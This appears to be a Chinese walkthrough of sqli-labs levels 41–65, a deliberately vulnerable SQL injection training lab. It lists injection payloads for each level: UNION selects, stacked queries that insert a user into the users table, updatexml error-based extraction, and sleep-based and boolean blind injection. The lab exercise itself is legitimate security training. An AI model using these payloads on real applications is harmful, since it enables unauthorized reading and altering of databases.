第四十一关
源码:
联合注入
?id=-1 union select 1,2,3
第四十二关
是一个登录界面
源码:
对输入的用户名进行了过滤但是对密码没有进行转义
堆叠注入
向users插入用户名和密码
login_user=admin&login_password=admin';insert into users(id,username,password) values ('66','xxy','123456')--+
报错注入
login_user=admin&login_password=admin' and updatexml(1,concat(0x7e,concat(database(),0x7e)),1)--
第四十三关
源码:
跟前一关一样就是闭合的方式不一样
login_user=admin&login_password=admin') and updatexml(1,concat(0x7e,concat(database(),0x7e)),1)--+
第四十四关
源码:
堆叠注入
login_user=1&login_password=a';insert into users values(66,'xxy','123456')#&mysubmit=Login
第四十五关
与之前第四十三关一样
源码:
第四十六关 排序注入
源码:
报错注入
sql语句是order by,sql语句参数没有引号且不能使用联合注入
http://localhost/Less-46/?sort=0%20or%20updatexml(1,concat(0x7e,database(),0x7e),1)
第四十七关
源码:
就是闭合的方式不一样
http://localhost/Less-47/?sort=0%27%20or%20updatexml(1,concat(0x7e,database(),0x7e),1)--+
第四十八关
源码:
没有报错语句的输出那就不能使用报错注入
延时注入:
1 and if(length(database())=8,1,sleep(2))--+
第四十九关
源码:
闭合的方式不一样跟前一关一样
第五十关
源码:
和第四十六关一样,可以使用updatexml进行报错注入,还可以使用堆叠注入,因为使用了mysqli_multi_query函数,支持多条sql语句执行。也可以延时注入
?sort=0 or updatexml(1,concat(0x7e,concat(database(),0x7e)),1)
第五十一关
源码:
与前面一关一样 就是闭合的方式不一样
第五十二关
源码:
没有报错显示,只能堆叠注入或者延时注入
第五十三关
源码:
字符型,单引号闭合,没有报错显示,可以使用堆叠注入和延时注入
?sort=1'and if(length(database())=8,1,sleep(5))--+
第五十四关
源码:
单引号闭合
联合注入:
?id=-1'union select 1,2,3--+
判断数据库名:
?id=-1'union select 1,database(),3--+
第五十五关
源码:
有14次机会,id参数是加了括号的整数
?id=-1) union select 1,database(),3--+
第五十六关
源码:
跟前面一关的闭合不一样 其他都一样
第五十七关
源码:
闭合:
?id="union select 1,database(),3--+
第五十八关
源码:
页面中显示的数据不是直接数据库里面取得,而是在一个数组里面取出得。所以联合注入是不可以滴,可以使用报错注入
?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+
第五十九关
源码:
?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)
第六十关
源码:
?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1) --+
第六十一关
源码:
?id=1')) and updatexml(1,concat(0x7e,database(),0x7e),1)--+
第六十二关
源码:
可以使用布尔盲注和时间注入
?id=1') and if(length((select database()))=10,sleep(5),1)--+ 时间注入,如果出现延迟表示该数据库名长度是10
?id=1')and length((select database()))=10--+ 布尔盲注
第六十三关
源码:
可以使用布尔盲注和时间注入
?id=1' and length((select database()))=10--+
第六十四关
源码:
?id=1)) and length((select database()))=10--+
第六十五关
源码:
跟之前的一样